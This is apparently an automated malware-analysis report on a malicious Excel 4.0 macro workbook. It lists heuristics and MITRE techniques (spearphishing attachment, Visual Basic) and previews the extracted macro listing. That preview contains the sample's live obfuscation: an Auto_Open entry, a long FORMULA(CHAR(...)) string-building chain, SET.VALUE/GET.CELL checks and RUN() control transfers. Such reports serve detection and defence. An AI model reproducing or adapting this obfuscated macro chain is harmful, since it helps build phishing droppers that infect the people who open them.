MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains an Excel 4.0 macro sheet with an Auto_Open entry that is heavily obfuscated using chained formula and character functions. This obfuscation suggests an attempt to hide malicious code, likely intended to download and execute a secondary payload. The presence of an Auto_Open macro indicates it is designed to be delivered as a spearphishing attachment.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAINExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 129377 bytes |
SHA-256: 7bd902d873232967410161f7ec002cff5ccef284b4ceecca1fecdc8737b26c31 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!DT47101 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,JH31,"",-0.16507177033492823059 ' Sheet,J133,"",209.00000000000000000000 ' Sheet,EV149,"",-0.09486166007905137698 ' Sheet,ET182,"",169.00000000000000000000 ' Sheet,JU291,"",0.08819241982507289301 ' Sheet,BL317,"",0.03571428571428571230 ' Sheet,W445,"",574.00000000000000000000 ' Sheet,HB515,"",1.84761904761904771632 ' Sheet,P524,"",169.00000000000000000000 ' Sheet,HW597,"",-13.47058823529411775155 ' Sheet,BC633,"",-4.80908990909090938715 ' Sheet,DY754,"",19.07843137254901932920 ' Sheet,J758,"",-502.00000000000000000000 ' Sheet,BN769,"",-116.00000000000000000000 ' Sheet,CY875,"",0.04110996916752312352 ' Sheet,HT917,"",505.00000000000000000000 ' Sheet,DX952,"",-22.87500000000000000000 ' Sheet,CB1046,"",-6.43076923076923101519 ' Sheet,ED1100,"",0.01837928153717627300 ' Sheet,EP1113,"FORMULA(CHAR(CD63160+BF58097)&CHAR(CP28111/IO16281)&CHAR(FC57863-FC40069)&CHAR(IN47745*DW16719)&CHAR(CD63160*GC45233)&CHAR(EK7546-BY31718)&CHAR(CP28111+IZ9717)&CHAR(HV48205*L49812)&CHAR(HI33413+JF39115)&CHAR(IN47745/DB57231)&CHAR(CP28111-HW64086)&CHAR(HV48205/FE10511)&CHAR(HV48205*V20744)&CHAR(FC57863*HK1940)&CHAR(HV48205*CD41554)&CHAR(CD63160-EB9960)&CHAR(CD63160-HC37746)&CHAR(IN47745+GL2857)&CHAR(HI33413+BG8540)&CHAR(DG34476-GK4139)&CHAR(FC57863*HG45989)&CHAR(IN47745/CS30928)&CHAR(FC36731+FF3868)&CHAR(DG34476*BQ49327)&CHAR(EK7546+BE51470)&CHAR(EK7546-BG65497)&CHAR(HE313/EJ15236)&CHAR(FC36731-CX50147)&CHAR(FC36731+JE28536)&CHAR(EK7546*H42680)&CHAR(CD63160+CM20957)&CHAR(CD63160-DF2575)&CHAR(DG34476/BP8335)&CHAR(FC57863-X57390)&CHAR(HE313-IB23258)&CHAR(FC36731-CN11966)&CHAR(FC36731-BH35219)&CHAR(DG34476/ID16622)&CHAR(IN47745/JE26943)&CHAR(CD63160-J40836)&CHAR(HV48205*DZ29076)&CHAR(CD63160/EG45359)&CHAR(FC57863/HI44453)&CHAR(CP28111+IO9145)&CHAR(FC57863/DM57961)&CHAR(HV48205-EA41765)&CHAR(CD63160/CM1924)&CHAR(HI33413+BD39884)&CHAR(HE313/Q26342)&CHAR(CD63160+GE14939)&CHAR(HV48205-EY37828)&CHAR(EK7546-EG39194)&CHAR(HI33413+GM25278)&CHAR(HV48205*EY42150)&CHAR(FC36731-DX48967)&CHAR(IN47745+DQ2394)&CHAR(CD63160*HP56005)&CHAR(FC36731+FV63347)&CHAR(CP28111*IE43674)&CHAR(IN47745+CW39353)&CHAR(HV48205-EK32197)&CHAR(EK7546*FN26190)&CHAR(HV48205+CV54928)&CHAR(FC57863*CM43687)&CHAR(CP28111*DU5487)&CHAR(CP28111+IL10765)&CHAR(CP28111/DP41990)&CHAR(HI33413+DR62172)&CHAR(HE313+FZ56684)&CHAR(FC57863-JD22412)&CHAR(FC36731+HS25648)&CHAR(HV48205*BM1543)&CHAR(DG34476-DK25814)&CHAR(HE313*BY58331)&CHAR(DG34476*BV35998)&CHAR(FC36731-IR51019)&CHAR(IN47745+EY2292)&CHAR(FC57863/JK37869)&CHAR(FC57863/FI43889)&CHAR(DG34476*FG17282)&CHAR(FC57863*EW30022)&CHAR(HV48205/CS21465),O28951)","" ' Sheet,EP1114,RUN(FI60467),"" ' Sheet,HP1175,"",-551.00000000000000000000 ' Sheet,F1196,"",2319.00000000000000000000 ' Sheet,CP1247,"",-5.50000000000000000000 ' Sheet,CL1254,"",329.00000000000000000000 ' Sheet,BI1278,"",-52.50000000000000000000 ' Sheet,CY1320,"SET.VALUE(IT23468,GET.CELL(38,IT24628)*342/2)","" ' Sheet,CY1321,RUN(IM36116),"" ' Sheet,HI1378,"",551.00000000000000000000 ' Sheet,JQ1424,"",3.20560747663551381947 ' Sheet,U1429,"",2.29670329670329653737 ' Sheet,CH1483,"",-915.00000000000000000000 ' Sheet,HO1489,"",-0.22924901185770751866 ' Sheet,DS1501,"",0.18863636363636362980 ' Sheet,DE1507,"",1.54411764705882359472 ' Sheet,CX1520,"",1.31428571428571427937 ' Sheet,BM1543,"",0.19533527696793001605 ' Sheet,DK1761,"",3.79310344827586209959 ' Sheet,CM1924,"",-5.93181818181818165669 ' Sheet,HK1940,"",0.66503667481662587235 ' Sheet,FE2032,"",148.00000000000000000000 ' Sheet,EI2061,"",-3.31034482758620685061 ' Sheet,EB2117,"",-640.00000000000000000000 ' Sheet ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.